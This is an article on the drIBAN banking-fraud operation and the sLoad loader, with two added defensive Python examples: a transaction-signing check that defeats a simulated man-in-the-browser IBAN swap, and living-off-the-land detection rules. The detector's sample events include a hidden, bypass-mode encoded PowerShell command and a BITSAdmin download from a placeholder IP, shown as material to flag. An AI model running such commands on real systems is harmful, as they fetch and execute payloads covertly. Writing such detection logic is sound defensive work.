According to Cleafy researchers Federico Valentini and Alessandro Strino, the primary objective of the drIBAN fraud operation is to infect Windows workstations inside corporate environments and alter legitimate bank transfers initiated by the victims, changing the beneficiary so that the money lands in an account controlled by the attackers.
Web injects are a well-established technique in which a man-in-the-browser (MitB) attack inserts attacker-controlled scripts into legitimate web pages. Because the malware operates inside the browser, after TLS has been terminated, it can read and modify the traffic between the user's browser and the bank's server while the page, the session and the certificate all still look legitimate to the user.
The fraudulent transactions are typically carried out through an Automated Transfer System (ATS), a web-inject component that fills in and submits transfer forms automatically. Since the transfer is initiated from the victim's own computer and authenticated session, it can slip past anti-fraud controls that the bank has deployed on its side.
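To make the MitB failure mode concrete, here is an added Python example; it is not code from the Cleafy report or from drIBAN. It simulates a web inject that swaps the beneficiary after the user has approved the transfer, beside a bank-side check in which the out-of-band confirmation code is an HMAC bound to the amount and IBAN the user actually saw (the "what you see is what you sign" countermeasure). The device secret, nonce, function names and IBANs are all constructed for illustration.

```python
import hashlib
import hmac
from dataclasses import dataclass

# Hypothetical per-user secret provisioned on the out-of-band device (phone app or token),
# never present in the browser, so a web inject cannot recompute codes with it.
SECRET = b"per-user-device-secret-shared-at-enrolment"


@dataclass(frozen=True)
class Transfer:
    amount_cents: int
    beneficiary_iban: str
    nonce: str  # hypothetical per-transaction challenge issued by the bank


def canonical(t: Transfer) -> bytes:
    """Normalise the fields the user is shown so whitespace/case cannot be abused."""
    iban = t.beneficiary_iban.replace(" ", "").upper()
    return f"{t.amount_cents}|{iban}|{t.nonce}".encode()


def confirmation_code(secret: bytes, t: Transfer) -> str:
    """Code the out-of-band device computes over the details the user actually saw."""
    return hmac.new(secret, canonical(t), hashlib.sha256).hexdigest()[:8]


def server_accepts(secret: bytes, submitted: Transfer, code: str) -> bool:
    """Bank side: recompute over the *submitted* transfer; any swapped field changes the code."""
    return hmac.compare_digest(confirmation_code(secret, submitted), code)


def mitb_swap(t: Transfer, attacker_iban: str) -> Transfer:
    """Constructed stand-in for a web inject rewriting the beneficiary after approval."""
    return Transfer(t.amount_cents, attacker_iban, t.nonce)


def demo() -> dict:
    # Constructed sample transfer; the IBANs are the standard documentation examples, not real accounts.
    confirmed = Transfer(1_250_00, "IT60 X054 2811 1010 0000 0123 456", "n-7f3a")
    code = confirmation_code(SECRET, confirmed)  # what the user reads off the device and types in
    return {
        "untampered": server_accepts(SECRET, confirmed, code),
        "iban_swapped": server_accepts(SECRET, mitb_swap(confirmed, "DE89 3704 0044 0532 0130 00"), code),
        "amount_changed": server_accepts(SECRET, Transfer(9_990_00, confirmed.beneficiary_iban, confirmed.nonce), code),
    }


if __name__ == "__main__":
    for case, accepted in demo().items():
        print(f"{case:15s} accepted={accepted}")
```

The point of the design is that the browser is untrusted: the code only matches if the amount and IBAN reaching the bank are the ones the user confirmed on a device the malware does not control. A confirmation code that is merely a one-time password, unbound to the transaction contents, gives no protection here, because the inject can forward it unchanged alongside the altered beneficiary.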
According to Cleafy, 2021 marked the point at which the operation evolved from a traditional banking-trojan campaign into an advanced persistent threat. Further evidence suggests the activity cluster overlaps with a 2018 campaign, attributed by Proofpoint to TA554, that targeted users in Canada, Italy, and the United Kingdom.
The sLoad malware loader uses PowerShell to collect and exfiltrate data from infected systems. Its main role is reconnaissance: profiling the victim to decide whether it is valuable enough to warrant a heavier payload, such as the Ramnit banking trojan.
By abusing legitimate Windows components such as PowerShell and BITSAdmin, sLoad relies on living-off-the-land (LotL) techniques to avoid detection. The malware can also check the compromised workstation against a predetermined list of corporate banking institutions to determine whether it is a target of interest; if it is, sLoad proceeds with the infection chain.
Because its evasion strategy relies on PowerShell and other legitimate Windows programs, sLoad is particularly hard to detect and defend against: the presence of these tools is never suspicious on its own, so detection has to focus on how they are invoked (parent process, command-line arguments, network destinations) rather than on the binaries themselves. Organizations can reduce the likelihood of a sLoad infection with strong security practices and routine patching of known vulnerabilities.
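As an added example of that "look at how, not what" detection logic (not code from Cleafy or from sLoad), the following Python runs a few generic LotL heuristics over constructed Sysmon-style process-creation records. The rules flag encoded or hidden PowerShell invocations, BITSAdmin used to download files, and PowerShell spawned from a script host, while leaving ordinary administrative use of the same binaries alone. The sample events, the rule names and the regular expressions are assumptions for illustration, not sLoad's actual command lines.

```python
import re
from typing import Dict, List, Tuple

# Constructed Sysmon-style process-creation records; none of this is real sLoad telemetry.
# The base64 blob after -EncodedCommand is a placeholder, not a decodable payload.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "CommandLine": r'"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE" /n C:\Users\u\Downloads\fattura.docx'},
    {"ParentImage": r"C:\Windows\System32\wscript.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -NoProfile -w hidden -ExecutionPolicy Bypass -EncodedCommand SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"},
    {"ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "Image": r"C:\Windows\System32\bitsadmin.exe",
     "CommandLine": r"bitsadmin.exe /transfer upd /download /priority foreground http://203.0.113.10/img.png C:\Users\u\AppData\Local\Temp\img.png"},
    {"ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\bitsadmin.exe",
     "CommandLine": r"bitsadmin.exe /list /allusers"},  # admin listing BITS jobs: benign
    {"ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe Get-Process | Sort-Object CPU -Descending | Select-Object -First 5"},  # benign
]

# Generic LotL heuristics (assumed for this example): flag *how* the tool is invoked, not that it ran.
RULES: List[Tuple[str, re.Pattern]] = [
    ("powershell_encoded_command",
     re.compile(r"powershell(\.exe)?\b.*\s-(e|ec|enc\w*|encodedcommand)\b", re.I)),
    ("powershell_hidden_or_bypass",
     re.compile(r"powershell(\.exe)?\b.*\s-(w|windowstyle)\s+hidden\b"
               r"|powershell(\.exe)?\b.*\s-(ep|executionpolicy)\s+bypass\b", re.I)),
    ("bitsadmin_download",
     re.compile(r"bitsadmin(\.exe)?\b.*\s/(transfer|addfile|create)\b", re.I)),
]

# Parents from which an interactive PowerShell is unexpected on a corporate workstation.
SCRIPT_HOST_PARENTS = {"wscript.exe", "cscript.exe", "mshta.exe", "winword.exe", "excel.exe"}


def basename(path: str) -> str:
    """Last component of a Windows path, lower-cased for comparison."""
    return path.rsplit("\\", 1)[-1].lower()


def score_event(ev: Dict[str, str]) -> List[str]:
    """Return the names of every heuristic the event trips (empty list = nothing suspicious)."""
    hits = [name for name, rx in RULES if rx.search(ev["CommandLine"])]
    image, parent = basename(ev["Image"]), basename(ev["ParentImage"])
    if image == "powershell.exe" and parent in SCRIPT_HOST_PARENTS:
        hits.append("script_host_spawned_powershell")
    if image == "bitsadmin.exe" and parent == "powershell.exe":
        hits.append("powershell_spawned_bitsadmin")
    return hits


def triage(events: List[Dict[str, str]]) -> List[Tuple[int, List[str]]]:
    """Index and matched rules for every event worth an analyst's attention."""
    flagged = []
    for i, ev in enumerate(events):
        hits = score_event(ev)
        if hits:
            flagged.append((i, hits))
    return flagged


if __name__ == "__main__":
    for idx, hits in triage(SAMPLE_EVENTS):
        print(f"event {idx}: {', '.join(hits)}")
        print(f"    {SAMPLE_EVENTS[idx]['CommandLine']}")
```

Two of the five constructed events are flagged: the hidden, encoded PowerShell launched by wscript.exe, and the BITSAdmin download it spawns. The administrator's `bitsadmin /list` and the ad-hoc `Get-Process` one-liner pass untouched, which is the property such rules need in order to survive in a real SOC; in production these heuristics would be one input to a score alongside the network destination and whether the downloaded file is later executed.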